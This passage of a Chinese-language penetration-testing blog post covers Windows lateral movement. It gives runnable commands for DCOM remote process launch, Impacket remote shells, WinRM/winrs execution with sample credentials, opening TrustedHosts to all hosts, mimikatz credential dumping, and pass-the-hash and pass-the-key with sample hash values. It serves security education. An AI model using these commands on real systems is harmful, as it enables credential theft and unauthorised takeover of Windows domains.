<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过PowerShell与DCOM进行远程交互，创建Excel.Application对象的实例: </span></span><br><span class="line"><span class="variable">$com</span> = [<span class="type">activator</span>]::CreateInstance([<span class="type">type</span>]::GetTypeFromCLSID(<span class="string">"C08AFD90-F2A1-11D1-8455-00A0C91F3880"</span>,<span class="string">"192.168.1.131"</span>)) </span><br><span class="line"></span><br><span class="line"><span class="comment"># 然后执行如下命令，我们就可以调用该对象的"shellExecute"方法在远程主机上启动进程: $com.Document.Application.shellExecute("C:\shell.exe") </span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 完整的命令: </span></span><br><span class="line">[<span class="type">activator</span>]::CreateInstance([<span class="type">type</span>]::GetTypeFromCLSID(<span class="string">"C08AFD90-F2A1-11D1-8455-00A0C91F3880"</span>,<span class="string">"192.168.1.131"</span>)).Document.Application.shellExecute(<span class="string">"C:\shell.exe"</span>)</span><br></pre></td></tr></tbody></table></figure>

<h3 id="Impacket里的dcomexec-py脚本"><a href="#Impacket里的dcomexec-py脚本" class="headerlink" title="Impacket里的dcomexec.py脚本"></a>Impacket里的dcomexec.py脚本</h3><p>Impacket 里面提供的 dcomexec.py 脚本可以提供一个类似于 wmiexec.py 脚本的半交互式shell，但使用的是DCOM，目前支持MMC20.Application，ShellWindows和ShellBrowserWindow对象。</p>
<p>命令格式如下：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./dcomexec.py domain/username:password@ip </span><br><span class="line">./dcomexec.py domain/username:password@ip &lt;command&gt;</span><br></pre></td></tr></tbody></table></figure>

<h1 id="WinRM的利用"><a href="#WinRM的利用" class="headerlink" title="WinRM的利用"></a>WinRM的利用</h1><p>WinRM是通过执行WS-Management协议（用于远程软件和硬件管理的Web服务协议）来实现远程管理的，允许处于一个共同网络内的Windows计算机彼此之间互相访问和交换信息，对应的端口是5985。在一台计算机启用WinRM服务后，防火墙会自动放行其相关通信端口，在另一台计算机便能通过WinRM对其进行远程管理了。</p>
<p><strong>只有在Windows Server 2008以上版本的服务器中，WinRm服务才会自动启动。</strong></p>
<p><strong>在利用WinRM进行横向移动时，需要拥有远程主机的<strong><strong>管理员凭据信息</strong></strong>。</strong></p>
<h2 id="通过WinRM执行远程命令"><a href="#通过WinRM执行远程命令" class="headerlink" title="通过WinRM执行远程命令"></a>通过WinRM执行远程命令</h2><p>Windows远程管理提供了两个工具：<br>① Winrs，允许远程执行命令的命令行工具，利用了WS-Manage协议<br>② Winrm（Winrm.cmd)，内置系统管理命令行工具，允许管理员配置本机的WinRM服务。</p>
<p>在默认情况下，无法通过WinRM连接到目标系统。可能出现错误：Winrs error：WinRM客户端无法处理该请求。可以将默认身份验证与IP地址结合使用：<br>① 传输为HTTPS或目标位于TrustedHosts列表中，并且提供显式凭据<br>② 使用Winrm.cmd配置TrustedHosts。</p>
<p>执行以下命令，将目标地址添加到TrustedHosts中：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">winrm <span class="built_in">set</span> winrm/config/client <span class="selector-tag">@</span>{TrustedHosts=<span class="string">"192.168.1.1"</span>} </span><br><span class="line"></span><br><span class="line"><span class="built_in">set-Item</span> WSMan:localhost\client\trustedhosts <span class="literal">-value</span> *    </span><br><span class="line"><span class="comment"># 通过powershell，信任所有主机</span></span><br></pre></td></tr></tbody></table></figure>

<h2 id="Winrs"><a href="#Winrs" class="headerlink" title="Winrs"></a>Winrs</h2><p>winrs是Windows上远程管理提供的客户端程序，允许通过提供的用户凭据，在运行WinRM的服务器上执行命令。要求通信双方都安装了WinRM服务。</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 执行系统命令 </span></span><br><span class="line">winrs <span class="literal">-r</span>:http://<span class="number">192.168</span>.<span class="number">1.131</span>:<span class="number">5985</span> <span class="literal">-u</span>:Administrator <span class="literal">-p</span>:<span class="number">123</span>qwe<span class="selector-tag">@</span> <span class="string">"whoami"</span> </span><br><span class="line"><span class="comment"># 获取远程交互式命令行 </span></span><br><span class="line">winrs <span class="literal">-r</span>:http://<span class="number">192.168</span>.<span class="number">1.131</span>:<span class="number">5985</span> <span class="literal">-u</span>:Administrator <span class="literal">-p</span>:<span class="number">123</span>qwe<span class="selector-tag">@</span> <span class="string">"cmd"</span></span><br></pre></td></tr></tbody></table></figure>

<h2 id="Winrm-cmd"><a href="#Winrm-cmd" class="headerlink" title="Winrm.cmd"></a><strong>Winrm.cmd</strong></h2><p>winrm.cmd允许WMI对象通过WinRm传输进行远程交互，在本地或远程计算机上枚举WMI对象实例或调用WMI类方法。比如可以通过调用Win32_Process类的Create方法来创建远程实例。</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">winrm invoke create wmicimv2/win32_process <span class="literal">-SkipCAcheck</span> <span class="literal">-skipCNcheck</span> <span class="selector-tag">@</span>{commandline=<span class="string">"notepad.exe"</span>} <span class="literal">-r</span>:http://<span class="number">192.168</span>.<span class="number">1.131</span>:<span class="number">5985</span> <span class="literal">-u</span>:Administrator <span class="literal">-p</span>:<span class="number">123</span>qwe<span class="selector-tag">@</span></span><br></pre></td></tr></tbody></table></figure>

<h2 id="Evil-Winrm"><a href="#Evil-Winrm" class="headerlink" title="Evil-Winrm"></a>Evil-Winrm</h2><p><a target="_blank" rel="noopener" href="https://github.com/Hackplayers/evil-winrm">https://github.com/Hackplayers/evil-winrm</a></p>
<h1 id="PTH-amp-PTK-amp-PTT（hash、key、ticket传递）"><a href="#PTH-amp-PTK-amp-PTT（hash、key、ticket传递）" class="headerlink" title="PTH&amp;PTK&amp;PTT（hash、key、ticket传递）"></a>PTH&amp;PTK&amp;PTT（hash、key、ticket传递）</h1><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PTH(pass the hash)   <span class="comment">#利用 LM 或 NTLM 的值进行的渗透测试</span></span><br><span class="line">PTT(pass the ticket)  <span class="comment">#利用的票据凭证 TGT 进行的渗透测试</span></span><br><span class="line">PTK(pass the key) 	<span class="comment">#利用的 ekeys aes256 进行的渗透测试</span></span><br></pre></td></tr></tbody></table></figure>

<p><strong>PTH和PTK</strong></p>
<p>PTH 在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务，而不用提供明文密码。</p>
<p><strong>如果禁用了 ntlm 认证，PsExec 无法利用获得的 ntlm hash 进行远程连接，但是使用 mimikatz 还是可以攻击成功</strong>。对于 8.1/2012r2，安装补丁 <strong>kb2871997</strong> 的 Win 7/2008r2/8/2012 等，可以使用 AES keys 代替 NT hash 来实现 ptk 攻击</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># mimikatz</span></span><br><span class="line">privilege::debug      </span><br><span class="line"><span class="comment"># NTLM</span></span><br><span class="line">sekurlsa::logonPasswords     </span><br><span class="line"><span class="comment"># AES</span></span><br><span class="line">sekurlsa::ekeys</span><br></pre></td></tr></tbody></table></figure>

<p><strong>总结：KB2871997 补丁后的影响</strong></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/220740.html">https://www.freebuf.com/column/220740.html</a></p>
<p><strong>PTH：打补丁前任意用户都可以连接，打了补丁后只能 administrator 用户才可以连接</strong></p>
<p><strong>PTK：打补丁前不能连接，打补丁后才能任意用户都可以连接（采用 aes256 连接）</strong></p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304231725831.png" alt="img"></p>
<p><strong>PTT-票据传递</strong></p>
<p>PTT 攻击的部分就不是简单的 NTLM 认证了，它是利用 Kerberos 协议进行攻击的，三种常见的攻击方法：</p>
<p>MS14-068，Golden ticket，SILVER ticket。简单来说就是将连接合法的票据注入到内存中实现连接。</p>
<p>Golden ticket(黄金票据)，SILVER ticket(白银票据)属于权限维持技术</p>
<p>MS14-068  基于漏洞，造成的危害是允许域内任何一个普通用户，将自己提升至域管权限。微软给出的补丁是 kb3011780</p>
<h2 id="PTH"><a href="#PTH" class="headerlink" title="PTH"></a>PTH</h2><h3 id="利用Mimikatz进行PTH"><a href="#利用Mimikatz进行PTH" class="headerlink" title="利用Mimikatz进行PTH"></a><strong>利用Mimikatz进行PTH</strong></h3><p>Mimikatz内置了哈希传递的功能，需要本地管理员权限。</p>
<p>① 抓取用户的哈希</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::logonpasswords full"</span> <span class="keyword">exit</span></span><br></pre></td></tr></tbody></table></figure>

<p>② 利用抓取的域管理员的NTLM hash进行哈希传递</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::pth /user:Administrator /domain:uf9n1x.com /ntlm:93b95aef15f4d50fab96ffc44a2f326a"</span> <span class="keyword">exit</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="利用impacket进行PTH"><a href="#利用impacket进行PTH" class="headerlink" title="利用impacket进行PTH"></a><strong>利用impacket进行PTH</strong></h3><p>Impacket项目中具有远程执行功能的几个脚本几乎都可以进行哈希传递攻击，常见的有：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">psexec.py      <span class="comment"># 类似PSEXEC的功能示例，使用remcomsvc（https://github.com/kavika13/remcom） smbexec.py     # 与使用remcomsvc的psexec w/o类似的方法。这里描述了该技术。我们的实现更进一步，                    #实例化本地smbserver以接收命令的输出。这在目标计算机没有可写共享可用的情况下很有用。 python3 smbexec.py -hashes :3617ad523f47fc96f24c45943affd954 administrator@192.168.1.131 </span></span><br><span class="line">               <span class="comment">#-hashes 指定用户完整的哈希，如果LM哈希被废弃，就将其指定为0或者空 </span></span><br><span class="line"></span><br><span class="line">atexec.py      <span class="comment"># 此示例通过Task Scheduler服务在目标计算机上执行命令，并返回已执行命令的输出。</span></span><br><span class="line"></span><br><span class="line">wmiexec.py     <span class="comment"># 需要开放139和445端口，通过Windows Management Instrumentation使用的半交互式shell，它不需要在目标服务器上安装任何服务/代理，以管理员身份运行，非常隐蔽。</span></span><br><span class="line"></span><br><span class="line">python wmiexec.py <span class="literal">-hashes</span> <span class="number">00000000000000000000000000000</span>:<span class="number">3617</span>ad523f47fc96f24c45943affd954 administrator@<span class="number">192.168</span>.<span class="number">1.131</span> </span><br><span class="line">dcomexec.py    <span class="comment"># 类似于wmiexec.py的半交互式shell，但使用不同的DCOM端点。目前支持               MMC20.Application，ShellWindows和ShellBrowserWindow对象。</span></span><br></pre></td></tr></tbody></table></figure>

<p>用法：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 普通用法</span></span><br><span class="line">python3 xxx.py domain/user:password@ip</span><br><span class="line"><span class="comment"># 哈希传递</span></span><br><span class="line">python3 xxx.py domain/user@ip <span class="literal">-hashes</span> :<span class="number">93</span>b95aef15f4d50fab96ffc44a2f326a</span><br></pre></td></tr></tbody></table></figure>

<h2 id="PTK-aes256-传递"><a href="#PTK-aes256-传递" class="headerlink" title="PTK aes256 传递"></a>PTK aes256 传递</h2><p>打补丁后的工作组及域连接：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sekurlsa::pth /user:webserver<span class="literal">-2008</span> /domain:uf9n1x /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b</span><br></pre></td></tr></tbody></table></figure>

<h2 id="PTT-票据传递"><a href="#PTT-票据传递" class="headerlink" title="PTT 票据传递"></a>PTT 票据传递</h2><p>需要先了解kerberos认证原理，及金票银票等，放在下一篇讨论</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:1916003479@qq.com">uf9n1x</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://uf9n1x.top/2023/04/23/nei-wang-shen-tou-ba-heng-xiang-yi-bu-dong/">https://uf9n1x.top/2023/04/23/nei-wang-shen-tou-ba-heng-xiang-yi-bu-dong/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://uf9n1x.top">Uf9n1x's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><a class="post-meta__tags" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/04/25/nei-wang-shen-tou-jiu-kerberos-xie-yi-ptt-wei-pai-gong-ji/"><i class="fa fa-chevron-left">  </i><span>内网渗透（九）Kerberos协议</span></a></div><div class="next-post pull-right"><a href="/2023/04/22/javasec-ba-jndi-zhu-ru/"><span>javasec（八）jndi注入</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div class="layout" id="footer"><div class="copyright">&copy;2023 By uf9n1x</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>